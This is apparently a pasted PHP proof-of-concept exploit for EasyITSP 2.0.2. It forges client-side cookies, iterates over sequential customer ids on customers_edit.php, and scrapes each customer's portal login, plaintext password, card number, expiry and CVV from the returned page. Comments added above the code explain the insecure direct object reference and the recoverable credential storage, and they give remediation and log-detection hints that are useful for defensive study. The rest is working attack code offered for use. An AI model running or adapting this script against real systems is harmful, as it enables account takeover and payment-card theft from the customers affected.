
Exploit EasyITSP by Michal Blaszczak-blaszczakm.blogspot.com

a guest
Oct 26th, 2012
  1. <?php
     // Annotated proof-of-concept for EasyITSP 2.0.2 (product and version taken from the
     // usage banner below). For each customer id in a caller-supplied range the script
     // POSTs to customers_edit.php with two client-chosen cookies (cust_verify, cust_id)
     // and scrapes the login, password and card fields out of the returned HTML form.
     //
     // Server-side weaknesses the request shape points to (inferred from this listing;
     // confirm against the application code):
     //   - the customer portal appears to treat cookies set by the client as proof of
     //     identity instead of a server-side session;
     //   - there is no visible check that the requested customer id belongs to the
     //     caller, so sequential ids can be walked (insecure direct object reference);
     //   - the password and the card number, expiry and CVV are rendered back into
     //     form fields, so they are stored in recoverable form.
     //
     // Remediation direction: bind the customer id to an authenticated server-side
     // session and authorize every record access against it; never echo a stored
     // password into a form; keep only a salted password hash (password_hash());
     // do not retain the CVV at all (PCI DSS forbids storing it after authorization)
     // and tokenize or strongly encrypt the card number.
     //
     // Detection: request logs or WAF telemetry showing one client POSTing repeatedly
     // to customers_edit.php with a constant cust_verify cookie while cust_id and
     // customersid increase by one per request.
  2. error_reporting(0); // silences every PHP notice and warning for the rest of the run
  3. $arguments = getopt("a:b:c:"); // -a base URL, -b first id, -c last id (see usage text)
  4. $url = $arguments['a'];
  5. $id_pod =$arguments['b'];
  6. $id_end =$arguments['c'];
  7. if(count($arguments)!=3) // usage banner is printed unless all three options were given
  8. {
  9. echo '## Exploit - EasyITSP by Lemens Telephone Systems 2.0.2   '."\n";
  10. echo '## Discovery users with passwords              '."\n";
  11. echo '##                             '."\n";
  12. echo '## Author: Michal Blaszczak                '."\n";
  13. echo '## Website: blaszczakm.blogspot.com                '."\n";
  14. echo '## Date: 10.10.2012                   '."\n";
  15. echo '##                             '."\n";
  16. echo '## Greatz: cond, packet, jestemka1pi, sid, chez            '."\n";
  17. echo '##         #pakamera@freenode                 '."\n";
  18. echo '##         (old) #2600@ircnet                 '."\n";
  19. echo '##         (old) #mamo_mamo_jestem_chakerem@ircnet    '."\n";
  20. echo '##                            '."\n";
  21. echo '## Usage:                         '."\n";
  22. echo '## php exploit.php -a URL -b ID_START -c ID_STOP      '."\n";
  23. echo '##                            '."\n";
  24. echo '## Example:                       '."\n";
  25. echo '## php exploit.php -a http://lemens-ts.com/easyitsp/customer/ -b 5 -c 10'."\n";
  26.  
  27. exit;
  28. }
  29. $url2='customers_edit.php?currentpage=customers'; // page path appended to the -a base URL
  30. $url.=$url2;
  31. for ($id_pod; $id_pod <= $id_end; $id_pod++) { // inclusive walk over the id range
      // cust_verify is sent as an arbitrary constant and cust_id as the id being requested;
      // both values are chosen entirely by the client.
  32. $cookie = 'cust_verify=' . urlencode('#pakamera') . '; cust_id=' . urlencode($id_pod);
  33. $ch = curl_init($url);
  34. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // TLS peer certificate verification is turned off
  35. curl_setopt($ch, CURLOPT_HEADER, 1); // response headers are included in the returned string
  36. curl_setopt($ch, CURLOPT_COOKIE, $cookie);
  37. curl_setopt($ch, CURLOPT_POST, 1);//send using the POST method
  38. curl_setopt($ch, CURLOPT_POSTFIELDS, "customersid=$id_pod"); //data to send
  39. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // curl_exec returns the response instead of printing it
  40. $intro = curl_exec($ch);
  41. curl_close($ch);
  42.  
      // Each pattern below captures either a table cell's content or an input's value
      // attribute from the edit form. The preg_match return values are not checked.
  43. $regex_login = '#\<td title="Customer username for portal"\>(.+?)\<\/td\>#s';
  44. preg_match($regex_login, $intro, $login);
  45.  
      // The stored password is read from the value attribute of a password input, i.e. the
      // application writes it into the page markup.
  46. $regex_pass = '#\<td title="Customer password for portal"><input type="password" name="password" required="1" maxlength="45" value="(.+?)"\>\<\/td\>#s';
  47. preg_match($regex_pass, $intro, $pass);
  48.  
  49. $regex_ccnum = '#\<td title="Customer cc number"><input type="text" name="ccnumber" maxlength="20" value="(.+?)"\>\<\/td\>#s';
  50. preg_match($regex_ccnum, $intro, $ccnum);
  51.  
  52. $regex_ccexpire = '#\<td title="Customer cc expire"><input type="text" name="ccexpire" maxlength="8" value="(.+?)"\>\<\/td\>#s';
  53. preg_match($regex_ccexpire, $intro, $ccexpire);
  54.  
  55. $regex_cccvv = '#\<td title="Customer credit card CVV"><input type="text" name="cccvv" maxlength="6" value="(.+?)"\>\<\/td\>#s';
  56. preg_match($regex_cccvv, $intro, $cccvv);
  57.  
  58.  
  59.     $test = explode(" ",$login[1]);
  60.  
  61.  
      // Skips ids whose username capture begins with a closing </td>; presumably that is
      // what the pattern yields when the username cell is empty (confirm against a response).
  62.     if(trim($test[0])!='</td>')
  63.     {
  64.     echo 'ID:'.$id_pod."\n";
  65.     echo 'LOGIN:'.$login[1]."\n";
  66.     echo 'Password:'.$pass[1]."\n";
  67.     echo 'CCnumber:'.$ccnum[1]."\n";
  68.     echo 'CCexpire:'.$ccexpire[1]."\n";
  69.     echo 'CCCVV:'.$cccvv[1]."\n\n";
  70.     }
  71. }
  72.  
  73. ?>